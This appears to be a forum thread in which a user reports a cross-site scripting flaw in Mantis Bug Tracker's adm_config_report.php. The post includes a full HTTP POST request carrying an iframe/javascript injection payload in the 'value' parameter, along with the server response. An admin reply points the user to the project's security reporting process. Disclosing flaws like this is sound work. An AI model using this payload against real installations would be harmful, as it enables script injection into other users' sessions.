Cross-site scripting on Mantis Bug Tracker v2.10

General discussion of Mantis.

Moderators: Developer, Contributor

Post Reply
tuanklnew
Posts: 5
Joined: 28 Nov 2017, 03:10

Cross-site scripting on Mantis Bug Tracker v2.10

Post by tuanklnew »

Yesterday I accidentally found security vulnerability - Cross-site scripting on Mantis Bug Tracker. In more detail, I used Burpsuite to modify POST parameter to adm_config_report.php. Parameter named "value" with element: fixed_in_version, project_id, id are effected. I inserted </textarea><iframe src=javascript:alert(1212) on "fixed_in_version":

Code: Select all

POST /mantisbt/adm_config_report.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.70.11/mantisbt/adm_config_report.php
Cookie: MANTIS_secure_session=1;
MANTIS_STRING_COOKIE=6xgdamq8V5fgA4vDchh450KI4bKW2kxYeNRdhYfw4cvWrMPmBa7KMqx2HDi7QbsW;
PHPSESSID=ll27va6a7c2r3rv8m75phoraa7
Host: 192.168.70.11
Content-Length: 353
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
user_id=0&project_id=0&config_option=csv_columns&type=3&value=["id","project_id","reporter_id","handler_id","priority","severity","reproducibility","version","category_id","date_submitted","os","os_build","platform","view_state","last_updated","summary","status","resolution","fixed_in_version</textarea><iframe src=javascript:alert(1212) "]&action=edit
And I got response 200 from Mantis

Code: Select all

HTTP/1.1 200 OK
Last-Modified: Wed, 24 Jan 2018 11:10:36 GMT
Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.20
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Expires: Wed, 24 Jan 2018 11:10:36 GMT
x-ua-compatible: IE=edge,chrome=1
X-Powered-By: PHP/5.6.20
Date: Wed, 24 Jan 2018 11:10:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafeinline'; script-src 'self'; img-src 'self'
Cache-Control: no-store, no-cache, must-revalidate
Transfer-Encoding: chunked
Html response was inserted iframe:
Image
If you want to view full html content response, Look on output.txt file on attachment. I tested on Mantis 2.8.0 and 2.10.0
Attachments
output.txt
(18.97 KiB) Downloaded 267 times
atrol
Site Admin
Posts: 8366
Joined: 26 Mar 2008, 21:37
Location: Germany

Re: Cross-site scripting on Mantis Bug Tracker v2.10

Post by atrol »

Please create a report following those instructions https://www.mantisbt.org/wiki/doku.php/ ... y_problems
Please use Search before posting and read the Manual
Post Reply